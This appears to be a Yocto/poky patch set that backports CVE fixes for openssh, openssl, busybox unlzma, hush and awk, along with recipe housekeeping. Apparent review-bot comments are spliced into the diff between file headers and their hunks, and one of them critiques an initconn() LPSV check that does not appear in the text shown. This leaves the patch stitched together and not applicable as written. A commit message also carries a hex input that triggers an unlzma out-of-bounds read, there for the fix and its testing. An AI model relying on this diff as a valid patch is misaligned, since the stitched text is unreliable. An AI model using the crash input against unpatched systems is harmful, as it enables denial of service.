file://CVE-2021-40491.patch \ " SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52" diff --git a/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb index 9a83898e52..5213b28345 100644 --- a/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb +++ b/poky/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1" DEPENDS = "avahi" -SRC_URI = "git://github.com/lathiat/nss-mdns \ +SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \ " SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae" diff --git a/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb index f170cf4650..b4cbc1a76c 100644 
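Review bot: The IPv6 LPSV check added to initconn() compares `sin6_addr.s6_addr` with `!=`, and `s6_addr` is an array member, so the comparison is between the two arrays' addresses rather than their 16 bytes. Assuming `data_addr_sa6` and `hisctladdr` are distinct objects, as the casts suggest, the condition is always true and every IPv6 LPSV reply is rejected with "Passive mode address mismatch." That fails closed, so it does not reopen the CVE, but it breaks the mode. The two IPv4 checks compare `s_addr` values and are fine. The IPv6 test should compare contents: `if (memcmp (&data_addr_sa6->sin6_addr, &((struct sockaddr_in6 *) &hisctladdr)->sin6_addr, sizeof (struct in6_addr)) != 0)`. The body of initconn() continues outside these hunks.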
--- a/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb +++ b/poky/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb @@ -8,7 +8,7 @@ SRCREV = "90f3fe28aa25135b7e4a54a7816388913bfd4a2a" PV = "20201225" PE = "1" -SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https" +SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=master" S = "${WORKDIR}/git" inherit autotools diff --git a/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch new file mode 100644 index 0000000000..9fd7e932d1 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch @@ -0,0 +1,20 @@ +Description: fix double-free memory corruption in ssh-agent +Author: Marc Deslauriers <marc.deslauriers@canonical.com> +Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db + +Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com> + +CVE: CVE-2021-28041 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz] +Comment: No change in any hunk + +--- a/ssh-agent.c ++++ b/ssh-agent.c +@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e) + goto err; + } + free(ext_name); ++ ext_name = NULL; + break; + default: + error("%s: Unknown constraint %d", __func__, ctype); diff --git a/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch new file mode 100644 index 0000000000..bda896f581 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch 
@@ -0,0 +1,52 @@ +From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001 +From: Ali Abdallah <aabdallah@suse.de> +Date: Wed, 24 Nov 2021 13:33:39 +0100 +Subject: [PATCH] CVE-2021-41617 fix + +backport of the following two upstream commits + +f3cbe43e28fe71427d41cfe3a17125b972710455 +bf944e3794eff5413f2df1ef37cddf96918c6bde + +CVE-2021-41617 failed to correctly initialise supplemental groups +when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand, +where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser +directive has been set to run the command as a different user. Instead +these commands would inherit the groups that sshd(8) was started with. +--- + auth.c | 8 ++++++++ + 1 file changed, 8 insertions(+) + +CVE: CVE-2021-41617 +Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015] +Comment: No change in any hunk +Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com> + +diff --git a/auth.c b/auth.c +index 163038f..a47b267 100644 +--- a/auth.c ++++ b/auth.c +@@ -52,6 +52,7 @@ + #include <limits.h> + #include <netdb.h> + #include <time.h> ++#include <grp.h> + + #include "xmalloc.h" + #include "match.h" +@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command, + } + closefrom(STDERR_FILENO + 1); + ++ if (geteuid() == 0 && ++ initgroups(pw->pw_name, pw->pw_gid) == -1) { ++ error("%s: initgroups(%s, %u): %s", tag, ++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno)); ++ _exit(1); ++ } ++ + /* Don't use permanently_set_uid() here to avoid fatal() */ + if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) { + error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid, +-- +2.26.2 diff --git a/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb index 64a0a72a8f..ddc9ed0b32 100644 --- a/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb +++ b/poky/meta/recipes-connectivity/openssh/openssh_8.2p1.bb 
@@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \ and for executing commands on a remote machine." HOMEPAGE = "http://www.openssh.com/" SECTION = "console/network" -LICENSE = "BSD & ISC & MIT" +LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT" LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3" DEPENDS = "zlib openssl virtual/crypt" @@ -25,6 +25,8 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar file://sshd_check_keys \ file://add-test-support-for-busybox.patch \ file://CVE-2020-14145.patch \ + file://CVE-2021-28041.patch \ + file://CVE-2021-41617.patch \ " SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091" SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671" @@ -49,6 +51,15 @@ CVE_CHECK_WHITELIST += "CVE-2020-15778" # https://www.securityfocus.com/bid/30794 CVE_CHECK_WHITELIST += "CVE-2008-3844" +# openssh-ssh1 is provided for compatibility with old devices that +# cannot be upgraded to modern protocols. Thus they may not provide security +# support for this package because doing so would prevent access to equipment. +# The upstream OpenSSH developers see this as an important +# security feature and do not intend to 'fix' it. +# https://security-tracker.debian.org/tracker/CVE-2016-20012 +# https://ubuntu.com/security/CVE-2016-20012 +CVE_CHECK_WHITELIST += "CVE-2016-20012" + PAM_SRC_URI = "file://sshd" inherit manpages useradd update-rc.d update-alternatives systemd diff --git a/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch new file mode 100644 index 0000000000..8accbc9df2 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch 
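Review bot: The comment added above `CVE_CHECK_WHITELIST += "CVE-2016-20012"` opens by describing the openssh-ssh1 compatibility package, which is not what this recipe builds (openssh 8.2p1). It therefore does not say why this CVE is being accepted here. Only the last sentence and the two tracker links apply to the entry. A whitelist entry suppresses the finding in every CVE report, so the justification should name the CVE and the decision, for example `# CVE-2016-20012: upstream considers the reported behaviour intentional and does not plan to change it; see the tracker links below.`, and the openssh-ssh1 sentences should be dropped.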
@@ -0,0 +1,22 @@ +Using localtime() means the output can depend on the timezone of the build machine. +Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set. + +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> +Upstream-Status: Pending [should be suitable] + +Index: openssl-3.0.1/apps/progs.pl +=================================================================== +--- openssl-3.0.1.orig/apps/progs.pl ++++ openssl-3.0.1/apps/progs.pl +@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or + my %commands = (); + my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/; + my $apps_openssl = shift @ARGV; +-my $YEAR = [localtime()]->[5] + 1900; ++my $YEAR = [gmtime()]->[5] + 1900; ++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) { ++ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900; ++} + + # because the program apps/openssl has object files as sources, and + # they then have the corresponding C files as source, we need to chain diff --git a/poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb b/poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb index 5f281197c9..bf7cd6527e 100644 --- a/poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb +++ b/poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb @@ -17,13 +17,14 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \ file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \ file://afalg.patch \ file://reproducible.patch \ + file://reproducibility.patch \ " SRC_URI_append_class-nativesdk = " \ file://environment.d-openssl.sh \ " -SRC_URI[sha256sum] = "892a0875b9872acd04a9fde79b1f943075d5ea162415de3047c327df33fbaee5" +SRC_URI[sha256sum] = "0b7a3e5e59c34827fe0c3a74b7ec8baef302b98fa80088d7f9153aa16fa76bd1" inherit lib_package multilib_header multilib_script ptest MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash" 
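Review bot: The guard `$ENV{SOURCE_DATE_EPOCH} !~ /\D/` in the progs.pl hunk also accepts an empty string, because an empty value contains no non-digit character. An empty value is then passed to gmtime(), which Perl treats as 0, so `$YEAR` becomes 1970 with no diagnostic. Requiring at least one digit avoids that: `if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} =~ /^\d+$/) {`. With that change an empty or malformed value falls back to the current UTC year computed on the line above.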
diff --git a/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb index 67959576e8..f482bd297f 100644 --- a/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb +++ b/poky/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb @@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood" HOMEPAGE = "http://packages.debian.org/resolvconf" RDEPENDS_${PN} = "bash" -SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=master \ file://fix-path-for-busybox.patch \ file://99_resolvconf \ " diff --git a/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch new file mode 100644 index 0000000000..aef8a3db85 --- /dev/null +++ b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch 
@@ -0,0 +1,53 @@ +From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001 +From: Denys Vlasenko <vda.linux@googlemail.com> +Date: Tue, 15 Jun 2021 15:07:57 +0200 +Subject: [PATCH] unlzma: fix a case where we could read before beginning of + buffer +Cc: pavel@zhukoff.net + +Testcase: + + 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6 + 00 17 02 10 11 0f ff 00 16 00 00 + +Unfortunately, the bug is not reliably causing a segfault, +the behavior depends on what's in memory before the buffer. + +function old new delta +unpack_lzma_stream 2762 2768 +6 + +Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com> + +Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com> + +CVE: CVE-2021-42374 +Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937] +Comment: testdata dropped because of binary format + +--- + archival/libarchive/decompress_unlzma.c | 5 ++++- + testsuite/unlzma.tests | 17 +++++++++++++---- + testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes + 3 files changed, 17 insertions(+), 5 deletions(-) + create mode 100644 testsuite/unlzma_issue_3.lzma + +diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c +index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644 +--- a/archival/libarchive/decompress_unlzma.c ++++ b/archival/libarchive/decompress_unlzma.c +@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate) + uint32_t pos; + + pos = buffer_pos - rep0; +- if ((int32_t)pos < 0) ++ if ((int32_t)pos < 0) { + pos += header.dict_size; ++ if ((int32_t)pos < 0) ++ goto bad; ++ } + match_byte = buffer[pos]; + do { + int bit; +-- +2.34.0 + diff --git a/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch new file mode 100644 index 0000000000..c913eaee9c --- /dev/null +++ b/poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch 
@@ -0,0 +1,138 @@
+From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 16:05:57 +0200
+Subject: hush: fix handling of \^C and "^C"
+
+function old new delta
+parse_stream 2238 2252 +14
+encode_string 243 256 +13
+------------------------------------------------------------------------------
+(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985)
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42376
+Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba]
+Comment: No changes in any hunk
+---
+ shell/ash_test/ash-misc/control_char3.right | 1 +
+ shell/ash_test/ash-misc/control_char3.tests | 2 ++
+ shell/ash_test/ash-misc/control_char4.right | 1 +
+ shell/ash_test/ash-misc/control_char4.tests | 2 ++
+ shell/hush.c | 11 +++++++++++
+ shell/hush_test/hush-misc/control_char3.right | 1 +
+ shell/hush_test/hush-misc/control_char3.tests | 2 ++
+ shell/hush_test/hush-misc/control_char4.right | 1 +
+ shell/hush_test/hush-misc/control_char4.tests | 2 ++
+ 9 files changed, 23 insertions(+)
+ create mode 100644 shell/ash_test/ash-misc/control_char3.right
+ create mode 100755 shell/ash_test/ash-misc/control_char3.tests
+ create mode 100644 shell/ash_test/ash-misc/control_char4.right
+ create mode 100755 shell/ash_test/ash-misc/control_char4.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char3.right
+ create mode 100755 shell/hush_test/hush-misc/control_char3.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char4.right
+ create mode 100755 shell/hush_test/hush-misc/control_char4.tests
+
+diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right
+new file mode 100644
+index 000000000..283e02cbb
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.right
+@@ -0,0 +1 @@
++SHELL: line 1: : not found
+diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right
+new file mode 100644
+index 000000000..2bf18e684
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.right
+@@ -0,0 +1 @@
++SHELL: line 1: -: not found
+diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+diff --git a/shell/hush.c b/shell/hush.c
+index 9fead37da..249728b9d 100644
+--- a/shell/hush.c
++++ b/shell/hush.c
+@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string,
+ }
+ #endif
+ o_addQchr(dest, ch);
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ /* Convert "^C" to corresponding special variable reference */
++ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS);
++ o_addchr(dest, SPECIAL_VAR_SYMBOL);
++ }
+ goto again;
+ #undef as_string
+ }
+@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring,
+ if (ch == '\n')
+ continue; /* drop \<newline>, get next char */
+ nommu_addchr(&ctx.as_string, '\\');
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ nommu_addchr(&ctx.as_string, ch);
++ /* Convert \^C to corresponding special variable reference */
++ goto case_SPECIAL_VAR_SYMBOL;
++ }
+ o_addchr(&ctx.word, '\\');
+ if (ch == EOF) {
+ /* Testcase: eval 'echo Ok\' */
+@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring,
+ /* Note: nommu_addchr(&ctx.as_string, ch) is already done */
+
+ switch (ch) {
++ case_SPECIAL_VAR_SYMBOL:
+ case SPECIAL_VAR_SYMBOL:
+ /* Convert raw ^C to corresponding special variable reference */
+ o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL);
+diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right
+new file mode 100644
+index 000000000..94b4f8699
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.right
+@@ -0,0 +1 @@
++hush: can't execute '': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right
+new file mode 100644
+index 000000000..698e21427
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.right
+@@ -0,0 +1 @@
++hush: can't execute '-': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+--
+cgit v1.2.3
+
diff --git a/poky/meta/recipes-core/busybox/busybox_1.31.1.bb b/poky/meta/recipes-core/busybox/busybox_1.31.1.bb
index d9d5f4f96b..38b448b3e1 100644
--- a/poky/meta/recipes-core/busybox/busybox_1.31.1.bb
+++ b/poky/meta/recipes-core/busybox/busybox_1.31.1.bb
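Review bot: In CVE-2021-42376.patch the new `control_char3` and `control_char4` fixtures show nothing between the quotes (`$THIS_SH -c '\' SHELL`, `hush: can't execute '': ...`), which suggests they depend on a raw ^C byte that is not visible in this view; that is inferred from the subject line, not confirmed. If so, the patch file has to keep that byte intact through mail, editors and whitespace hooks, otherwise the tests added with this fix exercise a different input than the one the `SPECIAL_VAR_SYMBOL` branches handle. I would record it in the header, e.g. `Comment: test fixtures contain a literal ^C byte; do not re-encode`, and confirm the in-tree file with a hex dump. The `encode_string` and `parse_stream` bodies continue outside the inner hunks.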
@@ -52,6 +52,9 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \ file://0001-hwclock-make-glibc-2.31-compatible.patch \ file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \ file://0001-mktemp-add-tmpdir-option.patch \ + file://CVE-2021-42374.patch \ + file://CVE-2021-42376.patch \ + file://CVE-2021-423xx-awk.patch \ " SRC_URI_append_libc-musl = " file://musl.cfg " diff --git a/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch new file mode 100644 index 0000000000..7e3d47b88c --- /dev/null +++ b/poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch 
@@ -0,0 +1,215 @@
+From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001
+From: Sana Kazi <Sana.Kazi@kpit.com>
+Date: Wed, 8 Dec 2021 12:25:34 +0530
+Subject: [PATCH] busybox: Fix multiple security issues in awk
+
+Description: fix multiple security issues in awk
+Origin: backported awk.c from busybox 1.34.1
+
+CVE: CVE-2021-42378
+CVE: CVE-2021-42379
+CVE: CVE-2021-42380
+CVE: CVE-2021-42381
+CVE: CVE-2021-42382
+CVE: CVE-2021-42384
+CVE: CVE-2021-42385
+CVE: CVE-2021-42386
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz]
+
+Comment: Refreshed first hunk and removed few hunks as they are already present in source.
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com>
+
+---
+ editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 60 insertions(+), 20 deletions(-)
+
+diff --git a/editors/awk.c b/editors/awk.c
+index d25508e..4e4f282 100644
+--- a/editors/awk.c
++++ b/editors/awk.c
+@@ -272,7 +272,8 @@ typedef struct tsplitter_s {
+ /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */
+ /* operator is inserted between them */
+ #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \
+- | TC_STRING | TC_NUMBER | TC_UOPPOST)
++ | TC_STRING | TC_NUMBER | TC_UOPPOST \
++ | TC_LENGTH)
+ #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE)
+
+ #define OF_RES1 0x010000
+@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 =
+
+ #define OC_B OC_BUILTIN
+
+-static const uint32_t tokeninfo[] = {
++static const uint32_t tokeninfo[] ALIGN4 = {
+ 0,
+ 0,
+ OC_REGEXP,
+@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected)
+ const uint32_t *ti;
+
+ if (t_rollback) {
++ debug_printf_parse("%s: using rolled-back token\n", __func__);
+ t_rollback = FALSE;
+ } else if (concat_inserted) {
++ debug_printf_parse("%s: using concat-inserted token\n", __func__);
+ concat_inserted = FALSE;
+ t_tclass = save_tclass;
+ t_info = save_info;
+@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected)
+ goto readnext;
+
+ /* insert concatenation operator when needed */
+- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) {
++ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__,
++ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP));
++ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)
++ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */
++ ) {
+ concat_inserted = TRUE;
+ save_tclass = tc;
+ save_info = t_info;
+@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected)
+ t_info = OC_CONCAT | SS | P(35);
+ }
+
++ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass);
+ t_tclass = tc;
+ }
+ ltclass = t_tclass;
+@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected)
+ EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN);
+ }
+
++ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double);
+ return ltclass;
+ #undef concat_inserted
+ #undef save_tclass
+@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp)
+ glptr = NULL;
+
+ } else if (tc & (TC_BINOP | TC_UOPPOST)) {
+- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__);
++ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc);
+ /* for binary and postfix-unary operators, jump back over
+ * previous operators with higher priority */
+ vn = cn;
+@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp)
+ v = cn->l.v = xzalloc(sizeof(var));
+ if (tc & TC_NUMBER)
+ setvar_i(v, t_double);
+- else
++ else {
+ setvar_s(v, t_string);
++ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */
++ }
+ break;
+
+ case TC_REGEXP:
+@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp)
+
+ case TC_LENGTH:
+ debug_printf_parse("%s: TC_LENGTH\n", __func__);
+- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM);
++ next_token(TC_SEQSTART /* length(...) */
++ | TC_OPTERM /* length; (or newline)*/
++ | TC_GRPTERM /* length } */
++ | TC_BINOPX /* length <op> NUM */
++ | TC_COMMA /* print length, 1 */
++ );
+ rollback_token();
+ if (t_tclass & TC_SEQSTART) {
+ /* It was a "(" token. Handle just like TC_BUILTIN */
+@@ -1747,12 +1763,34 @@ static void fsrealloc(int size)
+ nfields = size;
+ }
+
++static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[])
++{
++ int r = regexec(preg, s, 1, pmatch, 0);
++ if (r == 0 && pmatch[0].rm_eo == 0) {
++ /* For example, happens when FS can match
++ * an empty string (awk -F ' *'). Logically,
++ * this should split into one-char fields.
++ * However, gawk 5.0.1 searches for first
++ * _non-empty_ separator string match:
++ */
++ size_t ofs = 0;
++ do {
++ ofs++;
++ if (!s[ofs])
++ return REG_NOMATCH;
++ regexec(preg, s + ofs, 1, pmatch, 0);
++ } while (pmatch[0].rm_eo == 0);
++ pmatch[0].rm_so += ofs;
++ pmatch[0].rm_eo += ofs;
++ }
++ return r;
++}
++
+ static int awk_split(const char *s, node *spl, char **slist)
+ {
+- int l, n;
++ int n;
+ char c[4];
+ char *s1;
+- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+
+ /* in worst case, each char would be a separate field */
+ *slist = s1 = xzalloc(strlen(s) * 2 + 3);
+@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist)
+ return n; /* "": zero fields */
+ n++; /* at least one field will be there */
+ do {
++ int l;
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
++
+ l = strcspn(s, c+2); /* len till next NUL or \n */
+- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0
++ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0
+ && pmatch[0].rm_so <= l
+ ) {
++ /* if (pmatch[0].rm_eo == 0) ... - impossible */
+ l = pmatch[0].rm_so;
+- if (pmatch[0].rm_eo == 0) {
+- l++;
+- pmatch[0].rm_eo++;
+- }
+ n++; /* we saw yet another delimiter */
+ } else {
+ pmatch[0].rm_eo = l;
+ if (s[l])
+ pmatch[0].rm_eo++;
+ }
+- memcpy(s1, s, l);
+- /* make sure we remove *all* of the separator chars */
+- do {
+- s1[l] = '\0';
+- } while (++l < pmatch[0].rm_eo);
+- nextword(&s1);
++ s1 = mempcpy(s1, s, l);
++ *s1++ = '\0';
+ s += pmatch[0].rm_eo;
+ } while (*s);
++
++ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }'
++ * should print "2 0 ":
++ */
++ *s1 = '\0';
++
+ return n;
+ }
+ if (c[0] == '\0') { /* null split */
+@@ -1995,7 +2035,7 @@ static int ptest(node *pattern)
+ static int awk_getline(rstream *rsm, var *v)
+ {
+ char *b;
+- regmatch_t pmatch[2];
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+ int size, a, p, pp = 0;
+ int fd, so, eo, r, rp;
+ char c, *m, *s;
diff --git a/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index 677768d35a..b39f7523c0 100644
--- a/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/poky/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -11,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517" PV = "0.1+git${SRCPV}" PR = "r2" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" UPSTREAM_CHECK_COMMITS = "1" S = "${WORKDIR}/git"
diff --git a/poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb
index bea0e74ed0..755c841bad 100644
--- a/poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb
